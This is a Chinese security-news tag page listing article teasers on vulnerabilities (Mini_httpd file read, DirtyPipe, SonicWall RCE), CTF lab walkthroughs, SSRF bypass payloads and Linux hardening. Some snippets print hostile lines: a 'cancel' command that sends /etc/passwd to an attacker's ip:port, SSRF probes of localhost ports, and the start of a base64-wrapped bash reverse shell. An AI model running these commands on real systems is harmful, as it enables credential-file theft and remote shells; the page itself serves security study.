passwd - 第 18 | CN-SEC 中文网

安全漏洞

ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778

1.漏洞描述漏洞原因是由于没有过滤Http包头的特定字段，导致可以构造访问系统文件的路径，从而导致可访问任意文件，攻击者可以利用该漏洞读取设备的任意文件，这将严重威胁采用Mini_httpd的设备的安...

07月17日99 views评论

阅读全文

安全文章

Vulnhub之AI web1.0

Pdsdt 2019.10.1在这个举国欢庆的日子里，我充满自豪感的看完了阅兵，正准备打开公司CEO(glzjin)的buuoj平台继续刷刷web和一些入门re，忽然想起CEO说国庆平台要关闭，无奈之...

07月13日24 views评论

阅读全文

安全文章

bypass payload list

→ssrf.php?url=http://127.0.0.1:22→ssrf.php?url=http://127.0.0.1:80→srf.php?url=http://127.0.0.1:443→...

07月05日31 views评论

阅读全文

安全文章

奇淫技巧:linux下无回显可将回显发送到服务器

靶机无回显的情况下可使用 cancel 来把回显发送到攻击机端cancel -u "$(cat /etc/passwd)" -h ip:port攻击机...

07月05日60 views评论

阅读全文

SecIN安全技术社区

Linux内核权限提升漏洞DirtyPipe（CVE-2022-0847）

0x01 漏洞描述 2022年３月７日，研究人员公开披露了Linux 内核中的一个权限提升漏洞（CVE-2022-0847，也称为“Dirty Pipe”），允许非特权用户注入和覆盖任意只读文件中的数...

06月30日89 views已关闭评论

阅读全文

安全漏洞

SonicWall SSL-VPN RCE（远程命令执行）

粗茶淡饭不要紧，朋友散场没关系，兵荒马乱也无所谓…你拥有热气腾腾的灵魂，坚定不移的信念，每一天都有突破，每一步都在前进，坚持下去，沉淀下来。日子总会变好。漏洞简介SonicWallSSL-VPN 8....

06月29日530 views评论

阅读全文

绕过 Linux Shell 限制

常见现实绕过Reverse Shell# Double-Base64 是避免像+之类符号的方法。90%的情况下是有效的echo "echo $(echo 'bash -i >&...

06月14日安全文章38 views评论

阅读全文

安全文章

zico's shop靶机复现

Filename: zico2.ovaFile size: 828 MBMD5:19A5D894D32270875BA6565583BB750BSHA1:75FA4171A28B4B6F7CEB2EB...

06月08日115 views评论

阅读全文

安全漏洞

CVE-2022-0847：Linux DirtyPipe内核提权漏洞

上方蓝色字体关注我们，一起学安全！作者：7e1even@Timeline Sec本文字数：585阅读时长：2～3min声明：仅供学习参考使用，请勿用作违法用途，否则后果自负0x01 简介Linux内核...

06月07日77 views评论

阅读全文

安全闲碎

Linux 服务器基本必备的安全设置

修改 ssh 登陆配置打开 ssh 配置文件vim /etc/ssh/sshd_config#修改以下几项Port 10000#更改SSH端口，最好改为10000以上，别人扫描到端...

05月24日19 views评论

阅读全文

安全闲碎

等保测评主机安全之centos之密码长度

注：本文和等保联系其实并不大，主要还是说一些linux里细节一些的东西，而且很有可能会浪费你生命中的好几分钟……密码长度，作为等级保护主机测评项里中密码复杂度要求之一，是必须要查的。对于密码长度的设置...

05月23日40 views评论

阅读全文

Python 模板字符串与模板注入

这几年比较火的一个漏洞就是 jinjia2 之类的模板引擎的注入，通过注入模板引擎的一些特定的指令格式，比如{{1+1}}而返回了2得知漏洞存在。实际类似的问题在 Python 原生字符串中就存在，尤...

05月17日安全博客49 views评论

阅读全文

ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778

Vulnhub之AI web1.0

bypass payload list

奇淫技巧:linux下无回显可将回显发送到服务器

Linux内核权限提升漏洞DirtyPipe（CVE-2022-0847）

SonicWall SSL-VPN RCE（远程命令执行）

绕过 Linux Shell 限制

zico's shop靶机复现

CVE-2022-0847：Linux DirtyPipe内核提权漏洞

Linux 服务器基本必备的安全设置

等保测评主机安全之centos之密码长度

Python 模板字符串与模板注入

在线咨询

微信